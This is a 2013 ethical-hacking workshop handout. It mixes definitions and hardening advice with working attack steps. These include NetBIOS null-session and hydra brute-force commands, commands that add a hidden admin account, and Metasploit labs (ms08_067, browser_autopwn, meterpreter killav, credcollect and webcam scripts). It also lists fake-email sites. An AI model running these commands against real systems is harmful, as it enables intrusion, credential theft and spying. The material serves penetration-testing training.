Ethical Hacking &

Penetration Testing
(Overview)

By

Engr. Effiong Ndarake Effiong

CEng, MBCS, CITP, CEH, CHFI, MCSE, CCNA, MCTS, NCLA, DCTS, MIAM, ACE, B.Sc., M.Sc., Security+

Chartered Engineer, Chartered IT Professional; Captain / CIO, Efficacy Technologies Limited

 Disclaimer:

The information, exercise and tools contained in this paper may not be used by you or any other
party for any purpose that violates any local, state, federal or international law. You understand
that breaking into any network or computer system not owned by you or authorized by the owner
may be illegal

About Me:

I am a
CEng: Chartered Engineer
CITP: Chartered IT Professional
MIAM: Member International Academy of Management.
MBCS: Member British Computer Society
Member Association of Computing Machineries (ACM)
Member Information System Audit and Control Association (ISACA)
Certified Expert Witness and Prosecutor (National Institute of Justice, USA)
Certified Crime Scene Investigator (President DNA Initiative, USA)
Certified Digital Forensics Investigator (Texas A&M University, USA)
ACE: Access Data Certified Examiner
Security+: CompTIA security+ certified
MCP: Microsoft Certified Professional
MCTS: Microsoft Certified Technical Specialist
CEH: Certified Ethical Hacker.
CHFI: Computer Hacking Forensics Investigator
NCLA: Novell Certified Linux Administrator
DCTS: Data Center Technical Specialist.
CCNA: Cisco Certified Network Administrator
ITIL: Information Technology Infrastructure Library (Certified IT Service Manager)
CCSA: Cambridge University Certified Security Administrator
PGD: Post Graduate Diploma in Cyber Crime and Forensic Science
BSc: Bachelors of Science in Information Technology.
MSc: Masters of Science in Information Security
MBA: Masters of Business Administration in Technology Management (Ongoing)
IT Manager, MicroCred Microfinance Bank
Pioneer IT Manager, Peace Microfinance Bank
Penetration Tester, Ethical Hacker, Digital Forensics Examiner & Crime Scene Investigator.
IT Security Consultant, Cyber Crime Expert, Trainer and Information Security Researcher
Captain and CIO Efficacy Technologies Limited

Efficacy Technologies Limited @ July 2013 Page 2

Introduction:

"If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know
yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the
enemy nor yourself, you will succumb in every battle." Sun Tzu ‘the Art of War’

Over dependent of Individuals, Governments and Businesses in technology give birth to the
rising wave of cybercrime. This has made security now a necessity, not a luxury. If you are
unaware of that, no doubt, you are still living in the past. This workshop aim is to show you the
important of information security, and expose you to the hackers’ techniques and tools used in
assaulting security. I will equip you with the necessary techniques you need to defend yourself
and your network. This workshop alone won’t make you a hacker or an expert; it usually takes
years of study and experience to be a great hacker. To be a hacker you need motivation, initiative
and the ability to educate yourself. Let’s get started

Objective:
A the end of this workshop, you will learn how easy it is for the bad guys to break into networks
and also understand how to defend yourself and organization

Definations:

What is Penetration Testing?

Penetration test is the process of actively evaluating company’s information security measures.

What is Vulnerability Assessment?

Vulnerability assessment is the identification of weaknesses or vulnerabilities in the system

Ethical Hacking: The art and science of determining the vulnerability of your information
infrastructure to better defend it.

Uses of Ethical hacking:

 It is often used to determine the weakness in your network before the real hackers do?
 It uses the same techniques and tools as the bad guys
 It helps in finding the weakness and proffers solution to mitigate them

Threat
 This is an agent that can cause harm

Vulnerability
 Vulnerability is a flaw in our environment that a bad guy can use to harm us.

Exploit
 A way of breaching the security of IT system through its vulnerability

Efficacy Technologies Limited @ July 2013 Page 3

Risk
 This is the existence of vulnerability in our system

Risk Categorization
 High Likelihood + High Impact = Critical
 Low likelihood + High Impact = Urgent
 High Likelihood + Low Impact = Important
 Low Likelihood + Low Impact = Informational

Risk (R) = Asset value (A) x Threat (T) x Vulnerability (V)

R=AxTxV
Target
 A system or its component that is identified, subjected to a required security evaluation

Attack
 Any action that violet security of a system, it can be seen as an assault on the system
security.

Hacker
 An intelligent individual with excellent computer skills with the ability to create and
explore into the computer software and hardware

Hacking
 Hacking is the practice of modifying the features of a system, in order to accomplish a
goal outside of the creator's original purpose
Cracker
 A person who uses his hacking skills for malicious intent like stealing business data,
credit card information, password and destruction of computing resources.

Ethical Hacking and white hat hacking are often used interchangeably

Types of Ethical hacking:

 White Box testing – Have full knowledge of the infrastructure
 Gray Box testing – have partial Knowledge of the system
 Black Box testing – No knowledge what so ever of the infrastructure.

You’re Responsibilities as an Ethical hacker!

 Use knowledge and tools for legal purposes only
 Hack with the intension of identifying security issues and providing a remedy.
 Get signed management approval or authorization of the network owner.
 Create a test plan with exact parameter and goals of the test and get management
approval of your actions.
 Bear in mind that you are to defend the network and not to destroy it.
 Keep result and information strictly confidential.
 Make full disclosure of problems and fixes.

Efficacy Technologies Limited @ July 2013 Page 4

  Remember unauthorized access to any system not own by you is against the law.

Skills of a hacker:
 Working knowledge of TCP/IP
 Networking and hardware knowledge
 Understanding of command lines of windows and Linux
 Understanding of Windows and Linux OS, Mac OS X Solaris, etc.
 Understanding of Firewalls, routers, IDS’s and IPS’s etc.
 Understanding of common security vulnerabilities and how to correct them.
 Understanding of the working of various hacking tools and techniques
 Programming knowledge is a plus.
 Understanding hackers’ friendly language such as but not limited to, python, ruby, C, C+,
html will make your work easier
 Understanding of scripting language like bash is a good deal.
 Know everything about everything

Penetration testing and ethical hacking require a great deal, you have to understand what the
tools do, to avoid destroying the system or the organization you are trying to protect.

Types of attack
 Full Penetration
 Denial of service
 Specific Information
 Social Engineering

Classes of Hacking:
 White hat hacking (the good guys)
 Gray hat hacking (sometimes good and sometimes bad)
 Black hat hacking (the bad guys)

Formal Methodology
 OSSTMM (Open Source Security Testing Methodology Manual)
 NIST SP 800-42
 OCTAVE (Operational Critical Threat Asset Vulnerability Evaluation)
 TRAWG (Threat and Risk Assessment Working Guide)

Ethical hackers
 Employed by companies to perform penetration tests

Penetration test
 Legal attempt to break into a company’s network to find its weakest link
 Tester only reports findings, does not solve problems

Types of Penetration testing

 White Box Testing (Full knowledge of the infrastructure)

Efficacy Technologies Limited @ July 2013 Page 5

  Grey Box Testing (Partial knowledge of the infrastructure)
 Black Box Testing (No knowledge at all)

Security test
 More than an attempt to break in; also includes analyzing company’s security policy and
procedures
 Tester offers solutions to secure or protect the network

Security
 A state of wellbeing of information and infrastructure in which the possibility of
successful and yet undetectable theft or tampering and disrupting of information and
services is kept low or tolerable.

Element of Security.

The element of security also known as the CIA triad is as follows

 Confidentiality
 Integrity
 Availability

Security functionality and ease of use triangle:

Hacking your organization will not only affect data but also the integrity of your
organization

Accessing a computer without permission is illegal

What it takes to be a security tester

 Knowledge of network and computer technology
 Ability to communicate with management and IT personnel
 Understanding of the laws
 Ability to use necessary tools
 Programing knowledge is a plus

Phases of Hacking

Efficacy Technologies Limited @ July 2013 Page 6

  Reconnaisane
o Passive / Active
 Scanning
 Gaining Access
o Operating system level
o Application Level
o Network Level
o Denial of Service (DoS)
 Maintaining Access
 Clearing tracks

Hacktivism
 Hacking for a course

What hackers do!

Reconnaisance
 First step in hacking and penetration testing
 This is the gathering of as much information as possible about the target company,
network, infrastructure, personal and others
 Recon for short can be either passive or active

Scanning:
 Scanning the network to determine which host are alive on the network
 Thousands of tools are available for scanning networks
 Easily detected by Intrusion Detection System

Fingerprinting / service enumeration:

 Use to determine what service is running on the system to determine what vulnerabilities
might be avaialable
 Lots of tools available, scanning tools sometimes include fingerprinting capabilities

Vulnerability Assessment / Research

 Determines what vulnerability exist with application or service
 Use known vulnerability database
 Target most popular Operating systems and applications
 Lots of tools available, such as but not limited to
o Nessus, Retina, NeXpose
 Use vulnerability research sites as well, such as but not limited to
o www.windowsfocus.com
o www.security.com
o www.microsoft.com/security

Vulnerability Exploitation.
 Using know exploit or developing new ones to exploit discovered vulnerability to gain
access to the system.

Efficacy Technologies Limited @ July 2013 Page 7

Penetration and access
 Penetrating the system
 Systems are actually penetrated based upon the exploited vulnerabilities

Privilege escalation / owning the box

 Owning the box means gaining full control of the system
 Gaining administrative access privilege on the target system
 It may start as guest account, or normal user, exploit can be used to elevate privilege to
root or administrator right as the case may be

Evading IDS and Clearing tracks.

 Hackers can and will defeat IDS, firewall to avoid detection, using numerous tools and
techniques, such as but not limited to
o Fragmenting packets using “fragroute”
o Using Post redirectors and encoders that will change the look of the traffic
 Clearing tracks, deleting log files, hiding hackers tools of the system, resetting
permissions
Maintaining Access:
 Hacker will want to maintain access for as long as the like,
 Maintaining access to the system can be done using rootkits, trajon and other backdoors
 The system can be used as a zombie to attack other systems and widen the access to the
network.

Approaches to Ethical hacking.

 Remote Network
 Remote dialup network
 Local network
 Stolen equipment
 Social Engineering
 Physical Entry

Reconnasiance.
Passive Recon.
 Gathering information with whois and other sites without touching the target system.
o Source of information include: company website, Job site, company literature,
bulletin, partner site, forums, blogs, group, security and exchange commission,
better business bureau.
Active Recon
 Using various tools and techniques to gather information from the target system.

Output of Recon

Efficacy Technologies Limited @ July 2013 Page 8

  Names of companies officers, brach network and address, business partners and
connections, IP addresses space, staff email addresses, support phone numbers, domain
names, types of systems and applications

Recon Demo:
 Using WHOIS!
 www.whois.net
 www.johnny.ihackstuff.com
 Sam Spade
 Mail Bouncing
 Banner grabbing
 DNS Zone transfer
 theHarvester
 emailTrackerpro
 Wayback machine (www.archive.org)

Other may include

 People search
www.intellius.com
www.people.yahoo.com
www.jobsdb.com
 Advance googling
 Competitive intelligent gathering
www.clseek.com
www.intellogist.com/anacubis
 Extract DNS info
www.dnsstuff.com
www.arin.net
www.allwhois.com
 Finding the IP Range
 Discovery subnet
Traceroute
NeoTrace
Visual Trace
Website watcher
www.readnotify.com
www.afrinic.net
 Social Engineering
 Shoulder surfing
 Dumpster diving
 Piggybacking /Site visit

Telnet to www.targetcompany.com
ftp www.targetcompany.com
see the information supplied if successfully connected.

Efficacy Technologies Limited @ July 2013 Page 9

#netstat –n
#netstat –a
#netstat –ano
To see the connection

Security Sites:
 www.securiteam.com
 www.cybercrime.gov
 www.exploit-db.com
 www.zone-h.org
 www.securityfocus.com
 www.packetstormsecurity.com

Foot printing or profiling the organization, hacking is 90% profiling and 10% attacking

Foot printing output may include these and more.

 Unearthing initial information.
 Locate the network range
 Ascertain active machine
 Discover open ports / access points
 Detect operating systems
 Uncover services on ports
 Map the network

Other common deliverables include

 Domain Name Lookup
 Locations
 Contracts (telephone, email addresses etc.)

Steps in performing foot printing

 Find the company external and internal
 Perform whois lookup for personal details
 Extract DNS information
 Mirror the entire website and look up names
 Extract archives of the website
 Google for company’s news and press release
 Use people search for personal information of employees
 Find the physical location of the web server using Neotrace tools
 Analyze company’s infrastructure detail for job postings
 Track emails using readnotify.com

Foot printing Countermeasure:

 Don’t give accurate information in who is
 Go through a proxy for domain name registration
 Configure your systems not to response ICMP request

Efficacy Technologies Limited @ July 2013 Page 10

  All servers should be configured to require authentication before an nslookup can be
carried out.
Competitive intelligence gathering.
Numerous resources to find information legally
Competitive Intelligence
Gathering information using technology
Identify methods others can use to find information about your organization
 Limit amount of Information Company makes public
 Prevalent technology
 Educate users about spyware

Enumeration extracts information about:

 Resources or shares on the network
 User names or groups assigned on the network
 Last time user logged on
 User’s password
Before enumeration, you use Port scanning and foot printing
 To Determine OS being used
 Intrusive process

Scanning:
Scanning refers to a set of procedures for identifying host, service, and ports, in a network
A hacker will use this to create a blueprint of the organization and it vulnerabilities.

Types of Scanning.
 Port scanning
 Network Scanning
 Vulnerability scanning.

Objective of Scanning
 Detect live system on the network
 Discover open ports
 Discover Operating System (OS)
 Discover services
 Discover vulnerability.

Scanning Tools.
 Angry IP Scanner hping3 Friendly Pinger
 Nmap Nessus NetCat
 NeXpose Retina GFI Languard
 Nikto SATAN SAINT
 Cheops SuperScan Look@LAN etc.

Scanning Demo:
 Use of nmap, superscan, GFI Languard, Angry IP Scanner etc

Efficacy Technologies Limited @ July 2013 Page 11

Preventions:
 Use Good firewall (state full packet inspection).
 Use Intrusion detection system (IDS) and IPS
 Only needed ports should be opened
 All sensitive information should not be disclose
 Encrypt sensitive information sent over the internet
 Use ssh instead of telnet and https instead of http

System Hacking

Email crime:
Some of Free Anonymous Email Websites are:
 www.emkei.cz
 www.sendanonymousemail.net
 www.anonymailer.net
 www.mail.anonymizer.name (Send attachments as well)
 www.fakemailer.net
 www.fakemailer.info
 www.deadfake.com/send.aspx

Consequences of fake email:

 Email from your Email ID to any Security Agency declaring a Bomb Blast, war or
revolution can make you spend rest of your life jail
 Email from you to your Wife or Husband can cause Break-Up and damage your
relationship.
 Email from your Email ID to your Boss carrying your Resignation Letter or any
disciplinary case, can cause you your job or face disciplinary action.
 A fake email from a reputable organization claiming you’ve been offed employment can
cause you your resources and time.
 There are lots of damaging effects of fake emails.

Email Password hacking.

 There is no specified sound and proven attack available just to hack the password of
Email accounts.
 Also, it is not so easy to compromise the Email server like Yahoo, Gmail, etc.
 Email Password Hacking can be accomplished via some of the Client Side Attacks. We
try to compromise the user and get the password of the Email account before it reaches
the desired Email server.
 One easy way to hack email password is the very famous 'Phishing attack'
 Others are, Key loggers, shoulder surfing, social engineering etc.

Phishing attack

Efficacy Technologies Limited @ July 2013 Page 12

  The act of sending an Email to a user falsely claiming to be an established legitimate
enterprise in an attempt to scam the user into surrendering private information that will be
used for identity theft.
 The Email directs the user to visit a Web site where they are asked to update personal
information, such as passwords and credit card, valid ID number and bank account
numbers, which the legitimate organization already has. The Web site, however, is bogus
and set up only to steal the User’s information

Phishing Scams could also be:

 Emails inviting you to join a Social Group, asking you to Login using your Username and
Password
 Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock
IT
 Emails containing some Information of your Interest and asking you to Login to Your
Account
 Any Email carrying a Link to Click and asking you to Login
 A Facebook chat asking for your password as help in trying to regain the friends lost
password.

Counter Measures
 Understand that there is absolutely nothing you can do about it.
 Always use secure emails like PGP where possible
 You must use digital signature to sign all emails
 Read all the Email carefully and check the mail header to verify if the sender is original
 Watch the Link Carefully before Clicking
 Always check the URL in the browser before signing IN to your account
 Always Login to Your Accounts after opening the Trusted
 Websites, not by Clicking in any other Website or Email

Securing your Email Account

 Always configure a Secondary Email Address for the recovery purpose
 Properly configure the Security Question and Answer in the email Account
 Do Not Open Emails from strangers
 Do Not Use any other’s computer to check your Email
 Take Care of the Phishing Links
 Do not signing to any site with your correct email address and password
 Do not reveal your Passwords to your Friends or Mates

Malicious software
 A piece of software that carryout undesirable effect in the system.
 Network attacks prevent a business from operating
 Malicious software (Malware) includes
o Virus
o Worms
o Trojan horses

Efficacy Technologies Limited @ July 2013 Page 13

Goals of malicious software
o Destroy data
o Corrupt data
o Shutdown a network or system

Cyberattacks against ATM machines

o Slammer and Nachi worms
o Trend produces antivirus for ATM machines
o Nachi was written to clean up damage caused by the Blaster worm, but it got out
of control
o Diebold was criticized for using Windows for ATM machines, which they also
use on voting machine

Sends information from the computer to the attacker infected

o Confidential financial data
o Passwords
o PINs
o Any other stored data
o Can register each keystroke entered (key logger)

Trojan.
 Trojan is a malicious program misguided as some very important application.
 Trojan appears to perform a desirable and necessary function but that, because of hidden
and unauthorized code, performs functions unknown and unwanted by the user.

Common Examples of Trojan.

Beast Back Orifice
NetBus LetMeRule
Pro Rat GirlFriend
Sub7

Components of Trojans
Trojan consists of two parts:

1. A Client component
2. A Server component.

One which resides on the Victim’s computer is called the server part of the Trojan and the one
which is on the attacker’s computer is the client part of the Trojan.
For the Trojan to function as a backdoor, the server component has to be installed on the
Victim’s machine

Wrapper

Efficacy Technologies Limited @ July 2013 Page 14

  A wrapper is a program used to combine two or more executable into a single packaged
program.
 The wrapper attaches a harmless executable, like a game, to a Trojan’s payload, the
executable code that does the real damage, so that it appears to be a harmless file.
 Hackers use Wrappers to bind the Server part of the Software behind any image or any
other file.
 Wrappers are also known as Binders.

keyloggers
Used to capture keystrokes on a computer
 Hardware
 Software

Software
Behaves like Trojan programs

Hardware
Easy to install
Goes between the keyboard and the CPU
KeyKatcher and KeyGhost

Protection for key loggers

 Software-based
o Antivirus
 Hardware-based
o Random visual tests
o Look for added hardware

Lock up your servers

 Physical access means they can hack in
 Consider Ophcrack – booting to a CD-based OS will bypass almost any security

Physical security
 Protecting a network also requires physical security
 Inside attacks are more likely than attacks from outside the company

How are computers infected?

 A deceptive dialog box, that nay tell you the you your computer may be infected, run
scan now to clean it.

Session hijacking
 Enables attacker to join a TCP session
 Attacker makes both parties think he or she is the other party

Anonymous connection established without credentials

Efficacy Technologies Limited @ July 2013 Page 15

  Used to display information about users, groups, shares, and password policies
 Necessary only if networks need to support older Windows versions

To enumerate NetBIOS vulnerabilities use:

 Nbtstat, Net view, Netstat, Ping, Pathping, and Telnet commands

NetBIOS hacking steps:

Our target system is 192.168.168.131
In windows command prompt type:

#net use \\192.168.168.131\ipc$ “” /U: “” connect to the hidden inter processor share

#net use verify the connection

#net view \\192.168.168.131 view the network shares on the target system
#net use * \\192.168.168.131\share to map the share in the target machine to your machine.
#net use \\192.168.168.131\IPC$ /delete
#net use \\192.168.168.131\IPC$ “” /U: Administrator
This will connect to the administrator account, if it fails; it therefore means the administrator
account password is not blank. Then try to brute force the administrator’s password.
#nbtstat –A 192.168.168.131 to capture the name table over nbt

Efficacy Technologies Limited @ July 2013 Page 16

Use Hydra, John the ripper, Cain and Able, Ophcrack, Brutus, or and other password cracker to
crack the password
Example using hydra
#hydra.exe –l Administrator –P passlist.txt 192.168.168.131 smb

This will crack the administrator’s password using the password list given in passlist.txt if the
password is in the list, it will definitely crack it.

You can use “ShareEnum” utility freely available on the internet to enumerate all share folders
and services in the target machine

#compmgmt.msc /s to open the computer management

From action menu click connect to another computer and enter the IP address, in this case
192.168.168.131 and connect to it.
You can browse services, device management and other system information from the target.

#regedit opens the registry editor

Browse to HKEY_LOCAL_MACHINE—Software—Microsoft—Telnet Server 1.0  NTLM
Set the value data to 1, the will enable telnet.
#telnet 192.168.168.131
#net user hacker hacking /add this will create a user called hacker with a password
hacking in the remote machine
#net localgroup administrators hacker /add this will add the user hacker in the local
administrators group.

Password Cracking can be passive online using MITM, or offline attack using dictionary,
hybrid, or bruteforce.

Password cracking can also be non-technical such as

 Shoulder surfing
 Keyboard sniffing (keyloggers)
 Social engineering

Counter Measures:
 Smartcard
Efficacy Technologies Limited @ July 2013 Page 17
  Biometric
 Strong and complex passwords
 A combination of any two or all three of the above.

Comprehensive password policy is critical

Change passwords regularly
Should include:
 Require at least eight characters
 Require complex passwords
 Passwords can’t be common words, dictionary words, slang, jargon, or dialect
 Passwords must not be identified with a user
 Never write it down or store it online or in a file
 Do not reveal it to anyone
 Use caution when logging on and limit reuse

Configure domain controllers

 Enforce password age, length, and complexity
 Password policy aspects that can be enforced:
 Account lockout threshold
 Set number of failed attempts before account is disabled temporarily
 Account lockout duration
 Set period of time account is locked out after failed logon attempts
 Disable LM Hashes

LAB LAB LAB

Tools to be use include but not limited to:
 Core Impact (Commercial)
 Immunity Canvas (Commercial)
 Metasploit framework (Open source, that is FREE)
In this lab I will use Metasploit framework that comes with BackTrack 5r3

We are going to do the following.

 Scan for open ports in the victim machine
 Find open ports and services
 Find matching exploits
 Try exploits on victim to see if we can break in
 If we success use remote bind_tcp metapreter payload

 If the Victim is behind NAT, that is we cannot reach the victim directly with IP
connection.
 The victim needs to reach out to us (the attacker) first.
 We will use a client side attack
 Use browser based exploit
 Use social engineering

Efficacy Technologies Limited @ July 2013 Page 18

  Email infected pdf with metapreter payload, bind a Trojan and email the victim, etc.
 Use social engineers toolkit (SET)

Browser Exploit.
 Create a malicious site which exploit browser vulnerabilities
 Lure the victim to the site
 Victim browser will be exploited
 Use a reverse tcp metapreter payload
 The victim will initiate a connection
If Operating system is fully patched target other applications in the server

Exercise 1:
In Metasploit console (msf)
Exploit: windows/smb/ms08_067_netapi
Payload: windows/shell/bind_tcp
Do some damages: run commands like: ipconfig, route print, hostname, dir, mkdir, cd
pathping, tasklist etc.
Migrate to the desktop and create directory and a file in the directory.

Exercise 2:
Use the same exploit as above but with a different payload
Payload: windows/meterpreter/bind_tcp
You can background the meterpreter session open and get back to it with session –l, session –i
“session number” run all sorts of meterpreter commands that you can think of.

Exercise 3: Using client side attack to attack victims behind firewall or NAT
#use auxiliary/server/browser_autopwn
# set LHOST; SRVPORT, URIPATH
#run
It is advisable to set the SRVPORT to port 80 to avoid suspicion as this is the known http port

On the client machine open up internet explorer and connect to the attacker machine.
Watch what happen, meterpreter session will be opened and migrated from the attacker machine.

Run meterpreter commands such as

# session –l # session –i “session number”
#getuid #getdesktop

To take screenshot, the “espia” extension must be loaded which is not loaded by default.
#use espia #?
#screengrap #screenshot

We can also record audio and use webcam of the remote system as well. We can sniff on the
remote victim network and also run meterpreter script.

Efficacy Technologies Limited @ July 2013 Page 19

Meterpreter Script:
To run meterpreter script type run and hit “tab” twice to get a list of all available script.

Meterpreter> run
Lets run few selected scripts and have fun, scrips like

#run webcam #run gettelnet

#run file_collector #run get_loggedon_users
#run vnc #run duplicate
#run autoroute #run get_env
#run get_local_subnets #run killav
#run credcollect #run get_application_list

Exercise 4: Pivoting:
No direct access to the system
Broke into a system with direct connection that also have a connection the target system
We have meterpreter session from a directly connected system

Meterpreter>>
#run arp_scanner –h
#run arp_scanner –r 10.10.10.1/24
#background
#route –h
#route add 10.10.10.1 255.255.255.0 1(1 here = the meterpreter session opened)
#route print
#session –l
#back
Msf>> use auxiliary/scanner/portscan/tcp
#show options
#set RHOST and PORTS, then #run and #back
Use any exploit that the system is vulnerable to exploit the internal system

Exercise 5: Port forwarding

 Attacker have direct access to computer1 and no direct access to computer2
 Local listening ports is created on the attacker’s machine
 All traffic to this listening port is sent to the destination port on computer2
 Computer one act as a relay
 Computer1 has been broken into already
Meterpreter>>
#portfwd –h
#portfwd add –l 1500 –p 6262 –r 10.10.10.12
#background
Msf exploit (ms03_026_dcom) >>route print

Lunch a webbrowser from the attacker machine point it to port 6262 as was assigned

Efficacy Technologies Limited @ July 2013 Page 20

e.g. http://localhost:6262

Tools for identifying Vulnerabilities in windows.

Microsoft Baseline Security Analyzer (MBSA)
Capable of checking for:
Patches
Security updates
Configuration errors
Blank or weak passwords

Hardening your systems

 Conduct Penetration Testing frequently
o Finds and reports vulnerabilities
o Conduct Security Test often
o Finds vulnerabilities
o Gives recommendations for correcting the vulnerabilities
 Best way to keep systems secure
o Keep up to date
 Attackers take advantage of known vulnerabilities
o Options for small networks
 Accessing Windows Update manually
 Configure Automatic Updates
o Options for large networks
 Systems Management Server (SMS)
 Windows Software Update Service (WSUS)
 Third-party patch management solutions
o Antivirus solution is essential
 Small networks
 Desktop antivirus tool with automatic updates
 Large networks
 Require corporate-level solution
o Antivirus tools
 Almost useless if not updated regularly

Important steps for monitoring critical areas

 Performance
 Traffic patterns
 Possible security breaches
 Can have negative impact on performance
 Review regularly
 Signs of intrusion or problems
 Use log-monitoring tool
 Disable unneeded services
 Delete unnecessary applications or scripts
 Unused applications are invitations for attacks

Efficacy Technologies Limited @ July 2013 Page 21

  Reducing the attack surface
 Open only what needs to be open, and close everything else
 Filter out unnecessary ports
 Make sure perimeter routers filter out ports 137 to 139 and 445

Other practices include:

 Delete unused scripts and sample applications
 Delete default hidden shares
 Use different naming scheme and passwords for public interfaces
 Be careful of default permissions
 Use appropriate packet-filtering techniques
 Use available tools to assess system security
 Disable Guest account
 Rename (or disable) default Administrator account
 Make sure there are no accounts with blank passwords
 Use Windows group policies
 Develop a comprehensive security awareness program
 Keep up with emerging threats
 Patching not only the OS, but the applications too

Linux can be made more secure

o Awareness of vulnerabilities
o Keep current on new releases and fixes
 Many versions are available
 Differences ranging from slight to major
 It’s important to understand basics
o Run control and service configuration
o Directory structure and file system
o Basic shell commands and scripting
o Package management

Contact Detail:

Name: Engr. Effiong Ndarake Effiong

Organization: Efficacy Technologies Limited
Website: www.efficacytech.org; www.efficacytech.net; www.efficacytech.com
Email Address: [email protected]
Phone Number: +2348067856536; +2347087889898
Location: AL 2 Kudenda Road, Nassarawa, Kaduna, Kaduna State, Nigeria

To catch a thief you must think like one, not necessarily becoming one.

Efficacy Technologies Limited @ July 2013 Page 22

 Thank you!!!

Efficacy Technologies Limited @ July 2013 Page 23